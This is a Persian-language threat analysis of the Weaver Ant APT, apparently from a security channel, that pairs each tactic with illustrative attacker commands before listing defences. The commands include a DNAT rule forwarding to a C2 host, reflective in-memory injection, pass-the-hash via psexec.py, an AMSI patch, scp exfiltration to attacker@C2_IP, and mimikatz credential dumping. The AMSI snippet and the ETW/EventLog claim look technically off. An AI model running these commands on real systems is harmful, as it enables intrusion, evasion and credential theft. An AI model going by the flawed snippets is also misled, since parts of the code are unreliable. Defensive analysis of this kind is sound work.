تحلیل حمله APT گروه Weaver Ant:
1. روشهای نفوذ و تداوم حضور (TTPs):
الف. استفاده از روترهای Zyxel CPE بهعنوان نقاط رله (ORB):
دستورهای احتمالی مهاجم:
bash
# تغییر تنظیمات روتر برای ایجاد پروکسی مخفی
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination <C2_IP>:80
هدف: مخفی کردن ترافیک C2 در ترافیک عادی شبکه.
ب. استقرار وبشلهای چندلایه (China Chopper + INMemory):
دستورهای احتمالی:
powershell
# اجرای پیلود در حافظه (JIT) با استفاده از PowerShell
Invoke-ReflectivePEInjection -DLLPath eval.dll -FunctionName "MaliciousEntry"
هدف: فرار از تشخیص آنتیویروس با عدم ذخیره فایل روی دیسک.
ج. تونلزنی وبشلها (Shell Tunneling):
دستورهای احتمالی:
bash
# انتقال ترافیک از طریق وبشلهای زنجیرهای
curl -X POST -H "Cookie: SessionID=Hacked" --data "payload=<encrypted>" http://InternalServer/transfer
هدف: ایجاد ارتباط پنهان بین سرورهای داخلی.
2. حرکت جانبی (Lateral Movement):
الف. سوءاستفاده از SMB و NTLM هش:
دستورهای احتمالی:
bash
# استفاده از Pass-the-Hash برای دسترسی به سیستمهای دیگر
psexec.py -hashes :<NTLM_Hash> administrator@10.0.0.2
هدف: گسترش دسترسی بدون نیاز به رمز عبور .
ب. استفاده از حسابهای با دسترسی بالا:
دستورهای احتمالی:
powershell
# جستجوی حسابهای مدیر سیستم
Get-WmiObject -Class Win32_UserAccount | Where-Object {$_.SID -like "S-1-5-21-*500"}
هدف: افزایش دسترسی ها برای دسترسی به دادههای حساس.
3. جمعآوری دادهها و فرار از تشخیص:
الف. غیرفعال کردن ETW و AMSI:
دستورهای احتمالی:
powershell
# توقف سرویس ETW
Stop-Service -Name "EventLog" -Force
# بازنویسی تابع AMSI
[IntPtr]$amsiScanBufferAddr = Get-ProcAddress (Get-Module amsi.dll) "AmsiScanBuffer"
$patch = [Byte[]] (0xC3, 0x80, 0x07, 0x00)
[System.Runtime.InteropServices.Marshal]::Copy($patch, 0, $amsiScanBufferAddr, 4)
هدف: جلوگیری از ثبت فعالیتهای مخرب.
ب. سرقت فایلهای پیکربندی و اعتبارنامهها:
دستورهای احتمالی:
bash
# کپی کردن فایلهای تنظیمات شبکه
scp /etc/network/interfaces attacker@C2_IP:/stolen_data
# استخراج اعتبارنامهها از حافظه
mimikatz.exe "sekurlsa::logonpasswords" "exit"
هدف: نقشهبرداری از شبکه و دسترسی به سیستمهای کلیدی.
4. روشهای عملی برای دفاع (Mitigation):
الف. نظارت بر روترهای Zyxel CPE:
بررسی لاگهای دسترسی غیرعادی به پورتهای مدیریتی.
بهروزرسانی فریمور روترها برای رفع آسیبپذیریها.
ب. محدود کردن دسترسی SMB و NTLM:
فعالسازی احراز هویت چندعاملی (MFA) برای حسابهای حساس.
غیرفعال کردن NTLM و استفاده از Kerberos.
ج. نظارت بر فعالیتهای غیرعادی در حافظه:
استفاده از ابزارهایی مانند Sysmon برای ردیابی تزریق کد (Code Injection).
مانیتورینگ فراخوانی توابع eval.dll یا ماژولهای ناشناخته.
د. جداسازی شبکه (Network Segmentation):
محدود کردن ارتباط بین سرورهای داخلی و اینترنت با فایروال.
استفاده از میکروسگمنتیشن برای کنترل ترافیک شرکتی.
نتیجهگیری:
Weaver Ant
یک APT پیشرفته با تمرکز بر جاسوسی بلندمدت است که از تکنیکهای زیر استفاده میکند:
پنهانسازی ترافیک در دستگاههای شبکه (روترهای Zyxel).
اجرای کد در حافظه (JIT) برای فرار از تشخیص.
حرکت جانبی با سوءاستفاده از اعتبارنامههای ضعیف.
راهکار دفاعی: ترکیبی از نظارت پیشرفته (EDR/XDR)، حذف اعتبارنامههای قدیمی، و بهروزرسانی مداوم سیستمها.
@PfkSecurity